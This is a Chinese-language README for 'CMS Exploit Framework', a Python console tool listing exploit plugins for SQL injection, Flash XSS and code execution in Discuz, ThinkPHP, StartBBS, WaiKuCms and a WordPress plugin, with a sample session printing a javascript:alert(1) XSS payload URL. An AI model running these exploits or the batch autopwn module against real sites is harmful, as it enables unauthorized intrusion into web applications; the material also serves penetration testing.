Awesome
CMS Exploit Framework
简介
CMS Exploit Framework 是一款 CMS 漏洞利用框架,通过它可以很容易地获取、开发 CMS 漏洞利用插件并对目标应用进行测试。
安装
本框架采用 Python 语言开发,并且第三方依赖包都已打包,所以您所需要做的只是下载、启动。
chu@sh3ll-me:/tmp » git clone https://github.com/chuhades/CMS-Exploit-Framework.git
Cloning into 'CMS-Exploit-Framework'...
remote: Counting objects: 352, done.
remote: Compressing objects: 100% (182/182), done.
remote: Total 352 (delta 159), reused 347 (delta 154)
Receiving objects: 100% (352/352), 463.62 KiB | 16.00 KiB/s, done.
Resolving deltas: 100% (159/159), done.
Checking connectivity... done.
chu@sh3ll-me:/tmp » cd CMS-Exploit-Framework
chu@sh3ll-me:/tmp/CMS-Exploit-Framework » python console.py
_______________________
< CMS Exploit Framework >
-----------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
+ -- --=[ CMS Exploit Framework - 2014/10/10 ]
+ -- --=[ 6 CMS ]
+ -- --=[ 11 Plugins ]
CMS Exploit Framework >
使用
框架内输入 help
可查看详细的帮助信息,一般来讲,基本的使用步骤如下:
chu@sh3ll-me:/tmp/CMS-Exploit-Framework » python console.py
_______________________
< CMS Exploit Framework >
-----------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
+ -- --=[ CMS Exploit Framework - 2014/10/10 ]
+ -- --=[ 6 CMS ]
+ -- --=[ 11 Plugins ]
CMS Exploit Framework > help
Core Commands
=============
Command Description
------- -----------
help Help menu
use <plugin> Select a plugin by name
vulns List all vulnerabilities in the database
update Update the framework
vulns -d Clear all vulnerabilities in the database
exploit Run current plugin
vulns -o <plugin> Save vulnerabilities to file
search <keyword> Search plugin names and descriptions
set <option> <value> Set a variable to a value
rebuild_db Rebuild the database
info <plugin> Display information about one plugin
list List all plugins
version Show the framework version numbers
exit Exit the console
options Display options for current plugin
CMS Exploit Framework > list
Plugins
=======
Name Scope Description
---- ----- -----------
discuz_faq_gids_sqli Discuz 7.1-7.2 /faq.php 参数 gids 未初始化 导致 SQL 注入
discuz_flvplayer_flash_xss Discuz! x3.0 /static/image/common/flvplayer.swf Flash XSS
multi_autopwn All CMS 漏洞批量利用模块
multi_demo Demo Plugin Demo
multi_whatweb All CMS CMS 识别
startbbs_search_q_sqli StartBBS 1.1.5.2 /themes/default/search.php 参数 q 未过滤导致 SQL 注入
startbbs_swfupload_flash_xss StartBBS -1.1.5.3 StartBBS swfupload.swf Flash XSS
thinkphp_dispatcher_code_exec ThinkPHP 2.1,2.2,3.0 Dispatcher.class.php 代码执行
thinkphp_lite_code_exec ThinkPHP 3.0,3.1.2,3.1.3 ThinkPHP 以 lite 模式启动时存在代码执行漏洞
waikucms_search_code_exec WaiKuCms 2.0/20130612 Search.html 参数 keyword 代码执行
wordpress_all_in_one_seo_pack_xss All in One SEO Pack 1.3.6.4 - 2.0.3 WordPress All in One SEO Pack 插件低版本反射型 XSS
CMS Exploit Framework > info multi_whatweb
Name: multi_whatweb
CMS: multi
Scope: All CMS
Author:
Chu <root@sh3ll.me>
Description:
CMS 识别
Reference:
http://sh3ll.me/
CMS Exploit Framework > use multi_whatweb
CMS Exploit Framework > multi_whatweb > options
Name Current Setting Required Description
---- --------------- -------- -----------
URL True 网站地址
Thread 10 True 线程数
CMS Exploit Framework > multi_whatweb > set URL http://xxoo.com
URL => http://xxoo.com
CMS Exploit Framework > multi_whatweb > exploit
[+]http://xxoo.com: discuz
CMS Exploit Framework > multi_whatweb > search discuz
Matching Plugins
================
Name Scope Description
---- ------- -----------
discuz_faq_gids_sqli Discuz 7.1-7.2 /faq.php 参数 gids 未初始化 导致 SQL 注入
discuz_flvplayer_flash_xss Discuz! x3.0 /static/image/common/flvplayer.swf Flash XSS
CMS Exploit Framework > multi_whatweb > info discuz_flvplayer_flash_xss
Name: discuz_flvplayer_flash_xss
CMS: discuz
Scope: Discuz! x3.0
Author:
Chu <root@sh3ll.me>
Description:
/static/image/common/flvplayer.swf Flash XSS
Reference:
http://www.ipuman.com/pm6/138/
CMS Exploit Framework > multi_whatweb > use discuz_flvplayer_flash_xss
CMS Exploit Framework > discuz_flvplayer_flash_xss > options
Name Current Setting Required Description
---- --------------- -------- -----------
URL True 网站地址
CMS Exploit Framework > discuz_flvplayer_flash_xss > set URL http://xxoo.com
URL => http://xxoo.com
CMS Exploit Framework > discuz_flvplayer_flash_xss > exploit
[*]Requesting target site
[+]Exploitable!
[+]http://xxoo.com/static/image/common/flvplayer.swf?file=1.flv&linkfromdisplay=true&link=javascript:alert(1);
CMS Exploit Framework > discuz_flvplayer_flash_xss > vulns
Vulns
=====
Plugin Vuln
------ ----
multi_whatweb http://xxoo.com: discuz
discuz_flvplayer_flash_xss http://xxoo.com/static/image/common/flvplayer.swf?file=1.flv&linkfromdisplay=true&link=javascript:alert(1);
CMS Exploit Framework > discuz_flvplayer_flash_xss >
详细的使用说明请见项目 Wiki。
插件开发
框架托管于 Github,插件开发请参考 /plugins/multi/demo.py,然后 pull request。
详细的开发文档请见项目 Wiki。
作者
- ID: Chu
- Team: 网络尖刀
- Mail: root@sh3ll.me
- Weibo: @Chu______
- Blog: http://sh3ll.me/